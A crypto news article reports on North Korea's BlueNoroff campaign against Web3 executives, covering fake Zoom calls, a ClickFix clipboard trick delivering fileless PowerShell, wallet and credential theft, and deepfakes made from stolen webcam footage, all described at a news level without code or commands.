North Korea's BlueNoroff hackers used fake Zoom calls and AI deepfakes to breach a crypto firm and compromise more than 100 Web3 executives worldwide.
Key Points
- BlueNoroff posed as a fintech lawyer, sent a tampered calendar invite, and steered the target into a counterfeit Zoom call.
- A ClickFix clipboard trick ran fileless PowerShell that seized credentials and crypto wallet data in under five minutes.
- Stolen webcam footage fed AI deepfakes that impersonated past victims to bait the next round of targets.
BlueNoroff Hijacks Zoom Calls To Drain Wallets
Researchers at Arctic Wolf traced the monthslong intrusion to BlueNoroff, a financially driven arm of North Korea's Lazarus Group. The campaign struck a North American Web3 company on Jan. 23, 2026, and operators quietly held access for 66 days. Posing as a legal executive at a fintech firm, the attacker sent a Calendly invite for a routine catch-up call scheduled five months ahead.
After the target confirmed, the booking swapped its Google Meet link for a typo-squatted Zoom address that looked almost identical to the real one. Telemetry later showed the victim clicking the bad link three times in four minutes, convinced the software was simply glitching.
Also Read: Bitcoin Slides Under $59K As Fed Rate Fears Return To Crypto
ClickFix Prompt Plants Fileless PowerShell
Inside the counterfeit meeting, a pop-up claimed the Zoom SDK needed an update and offered a quick fix, a ruse known as ClickFix. When the victim copied the supplied commands, the page silently rewrote the clipboard and injected a hidden PowerShell payload. That single paste handed the attacker a foothold without any file ever touching disk.
The implant then beaconed to a remote server, scooping up browser logins and crypto wallet data, and lifted active Telegram sessions that were later reused to approach new targets from trusted accounts. From the first click to full system compromise, the entire chain ran in under five minutes, an unusually fast compromise.
Deepfakes Recycle Victims To Snare New Targets
The fake calls felt convincing because every participant tile showed stolen webcam footage, AI-generated headshots, or deepfake composite video, pulled from a library of more than 100 prior victims across 20 countries. Investigators tied the synthetic faces to OpenAI's GPT-4o model and traced the editing to one operator who left the macOS username "king" in the metadata. Each stolen face then fed the next lure, so every breach made the following attack harder to spot.
The United States accounted for 41% of those identified, with Singapore and the United Kingdom next in line. About 80% worked in crypto, blockchain finance, or nearby investment roles, and founders or chief executives made up close to half.
BlueNoroff is no newcomer to this trade. The group surfaced during the 2016 Bangladesh Bank heist, when it moved $81 million, then pivoted to crypto through its long-running SnatchCrypto operation. This campaign shows that the same playbook now runs on AI, raising the bar for every crypto team trying to defend it.
Read Next: AAVE Outperforms Bitcoin As DeFi Lending Narrative Returns